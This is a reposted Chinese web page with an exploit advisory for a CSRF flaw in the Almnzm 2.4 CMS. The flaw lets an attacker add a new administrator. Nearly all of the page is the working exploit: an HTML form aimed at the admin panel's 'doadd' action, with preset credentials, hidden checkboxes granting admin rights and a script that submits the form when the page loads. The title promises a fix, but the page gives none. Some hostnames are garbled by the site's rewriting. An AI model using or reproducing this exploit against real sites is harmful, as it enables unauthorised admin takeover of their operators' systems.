almnzm 2.4 <= CSRF缺陷 (添加管理员)及修复 - 网站

标题: almnzm 2.4 <= CSRF Vulnerability (Add Admin) 开发者: almnzm测试数据作者: HaNniBaL KsA (HK) HdhCmsTest2cto测试数据 hk@r00t-s3c测试数据 CSRF 测试(添加一个新管理员) : <center><b><font face="Tahoma" size="5">[ <font color="#FF0000">Priv8</font> ] <span dir="ltr"><font color="#FF0000">Almnzm 2.4</font><font color="#ffffff"> </font></span> CSRF Exploit!! </font><font face="Tahoma" size="2">>></font><font face="Tahoma" size="5"> </font> <font color="#FF0000" face="Tahoma" size="2">Add New Admin :D</font></b></p> <p align="center"><b><font face="Tahoma">By: <font color="#FF0000">HaNniBaL KsA</font> (<font color="#FF0000">HK</font>)</font></b></p><center> <b><font face="Tahoma"><a href="http://HdhCmsTest2cto测试数据">HdhCmsTest2cto测试数据</a></font></b><br /><br /> <form name="add" action="http://HdhCmsTest2cto测试数据 /PATH/admincpanel/index.php?action=doadd" method="post"> <table width="90%" cellspacing="1" cellpadding="4"><tr><td ><p align="center"> UserName: <input size=20 type="text" name="name" value="HK" ></td></tr><tr><td ><p align="center"> PassWord: <input size=20 type="password" name="password" value="123456" ></td></tr><tr><td ><p align="center"> E-mail: <input size=20 type="text" name="email" value="i@r00t-s3c测试数据" ></td></tr><tr><td><center> <table border=0><tr><td><tr><td> <! -- NOTE!: The value id'z for admin privileges can be change in any site :D "down in checkbox'z!" ^ so ? .. maybe this exploit will add a new admin but without administrator permissions "just user xD"!! --> <input type=checkbox type=hidden name=authorities1 value=25 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities2 value=24 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities3 value=34 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities4 value=41 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities5 value=39 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities6 value=12 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities7 value=21 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities8 value=38 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities9 value=9 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities10 value=2 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities11 value=3 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities12 value=4 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities13 value=5 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities14 value=6 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities15 value=11 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities16 value=44 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities17 value=50 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities18 value=18 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities19 value=30 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities20 value=14 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities21 value=37 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities22 value=35 checked></td></tr><tr><td> <input type=checkbox type=hidden name=authorities23 value=43 checked></td></tr></table></td></tr> <input type="hidden" name="formtype" value="add"> <input type="hidden" name="componentid" value="39"></center> <! -- 致谢r00t-s3c测试数据 & alm3refh测试数据--> <tr><td><p align="center"> <input size=50 type="submit" name="submit" value="Add New Admin :D" ></td></tr></table></center></form> <script>document.add.submit();</script> # # 新管理员登陆信息如下: # UserName: HK # PassWord: 123456

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://www.haodehen.cn/did12464

更新时间：2022-09-13 阅读：53次